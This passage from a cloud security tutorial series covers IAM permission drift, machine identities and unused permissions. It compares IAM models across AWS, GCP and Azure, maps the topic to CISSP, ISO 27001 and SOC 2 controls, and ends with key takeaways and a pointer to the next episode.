Drift. IAM configs don’t stay clean. An engineer needs to debug a production issue at 2 AM and grants themselves broad access temporarily. The temporary access never gets revoked. Multiply that by a team of 20 over three years. I’ve audited environments where 60% of the permissions in a role had never been used — not once — in the 90-day CloudTrail window. That unused 60% is pure attack surface.

The machine identity blind spot. Most IAM governance practices were built for human users. Service accounts, Lambda roles, and CI/CD pipeline identities get created rapidly and reviewed rarely. In my experience, these are the identities most likely to have excess permissions, least likely to be in the access review process, and most likely to be the initial foothold in a cloud breach.

The gap between granted and used. That said, this one surprised me most when I first started doing cloud security work. AWS data from real customer accounts shows the average IAM entity uses less than 5% of its granted permissions. That 95% excess isn’t just waste — it’s attack surface. Every permission that exists but isn’t needed is a permission an attacker can use if they compromise that identity.


IAM Across AWS, GCP, and Azure — The Conceptual Map

The three major providers implement IAM differently in syntax, but the same model underlies all of them. Once you understand one deeply, the others become a translation exercise.

Concept AWS GCP Azure
Identity store IAM users / roles Google accounts, Workspace Entra ID
Machine identity IAM Role (via instance profile or AssumeRole) Service Account Managed Identity
Access grant mechanism Policy document attached to identity or resource IAM binding on resource (member + role + condition) Role Assignment (principal + role + scope)
Hierarchy Account is the boundary; Org via SCPs Org → Folder → Project → Resource Tenant → Management Group → Subscription → Resource Group → Resource
Default stance Deny Deny Deny
Wildcard risk "Action": "*" on "Resource": "*" Primitive roles (viewer/editor/owner) Owner or Contributor assigned broadly

The hierarchy point is worth pausing on. AWS is relatively flat — the account is the primary security boundary. GCP’s hierarchy means a binding at the Organisation level propagates down to every project. Azure’s hierarchy means a role assignment at the Management Group level flows through every subscription beneath it.

The blast radius of a misconfiguration scales with how high in the hierarchy it sits.

This will matter in GCP IAM Policy Inheritance and Azure RBAC Explained when we go deep on GCP and Azure specifically. For now, the takeaway is: understand where in the hierarchy a permission is granted, because the same permission granted at the wrong level has a very different security implication.


Framework Alignment

If you’re mapping this episode to a control framework — for a compliance audit, a certification study, or building a security program — here’s where it lands:

Framework Reference What It Covers Here
CISSP Domain 1 — Security & Risk Management IAM as a risk reduction control; blast radius is a risk variable
CISSP Domain 5 — Identity and Access Management Direct implementation: who can do what, to which resources, under what conditions
ISO 27001:2022 5.15 Access control Policy requirements for restricting access to information and systems
ISO 27001:2022 5.16 Identity management Managing the full lifecycle of identities in the organization
ISO 27001:2022 5.18 Access rights Provisioning, review, and removal of access rights
SOC 2 CC6.1 Logical access security controls to protect against unauthorized access
SOC 2 CC6.3 Access removal and review processes to limit unauthorized access

Key Takeaways

  • IAM evolved from Unix file permissions → directory services → cloud policy engines, driven by scale and the failure modes of each prior model
  • Cloud IAM is deny-by-default: every access requires an explicit Allow somewhere in the policy chain
  • Identities are human or machine; in production, machines dominate — and they’re the under-governed majority
  • A policy binds a principal to actions on resources; every word is a deliberate security decision
  • The hardest IAM problems aren’t technical — they’re organisational: drift, unused permissions, machine identities nobody owns, and access reviews that never happen
  • The gap between granted and used permissions is where attackers find room to move

What’s Next

Now that you understand what IAM is and why it exists, the next question is the one that trips up even experienced engineers: what’s the difference between authentication and authorization, and why does conflating them cause security failures?

EP02 works through both — how cloud providers implement each, where the boundary sits, and why getting this boundary wrong creates exploitable gaps.

Next: Authentication vs Authorization: AWS AccessDenied Explained

Get EP02 in your inbox when it publishes → subscribe